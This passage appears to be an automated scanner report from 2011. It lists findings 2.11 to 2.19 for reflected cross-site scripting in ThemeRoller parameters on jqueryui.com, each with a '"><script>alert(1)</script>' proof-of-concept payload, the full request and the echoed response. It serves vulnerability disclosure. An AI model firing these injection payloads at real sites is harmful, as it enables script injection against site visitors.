   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff700a3"><script>alert(1)</script>d7165f4ffa4&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45
...[SNIP]...

2.11. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39b4d"><script>alert(1)</script>789ceeb21cc was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff39b4d"><script>alert(1)</script>789ceeb21cc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff39b4d"><script>alert(1)</script>789ceeb21cc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

2.12. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b2ca"><script>alert(1)</script>bbd45a16af0 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec8b2ca"><script>alert(1)</script>bbd45a16af0&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec8b2ca"><script>alert(1)</script>bbd45a16af0&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100
...[SNIP]...

2.13. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b43b1"><script>alert(1)</script>abf331c4dfa was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ecb43b1"><script>alert(1)</script>abf331c4dfa&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ecb43b1"><script>alert(1)</script>abf331c4dfa&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorAc
...[SNIP]...

2.14. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99b72"><script>alert(1)</script>aa83676237a was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=10099b72"><script>alert(1)</script>aa83676237a&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=10099b72"><script>alert(1)</script>aa83676237a&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefaul
...[SNIP]...

2.15. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c1f7"><script>alert(1)</script>b5453d5eae8 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=453c1f7"><script>alert(1)</script>b5453d5eae8&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=453c1f7"><script>alert(1)</script>b5453d5eae8&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgC
...[SNIP]...

2.16. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff412"><script>alert(1)</script>9ddca46b2ad was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75ff412"><script>alert(1)</script>9ddca46b2ad&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
php?ctl=themeroller&ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75ff412"><script>alert(1)</script>9ddca46b2ad&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorCon
...[SNIP]...

2.17. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f01c6"><script>alert(1)</script>3cf13468a55 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75f01c6"><script>alert(1)</script>3cf13468a55&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75f01c6"><script>alert(1)</script>3cf13468a55&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e17
...[SNIP]...

2.18. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c90"><script>alert(1)</script>75bdfecef6b was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pnga3c90"><script>alert(1)</script>75bdfecef6b&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pnga3c90"><script>alert(1)</script>75bdfecef6b&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHig
...[SNIP]...

2.19. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aed3"><script>alert(1)</script>16a6f61d3ed was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png7aed3"><script>alert(1)</script>16a6f61d3ed&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120076

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
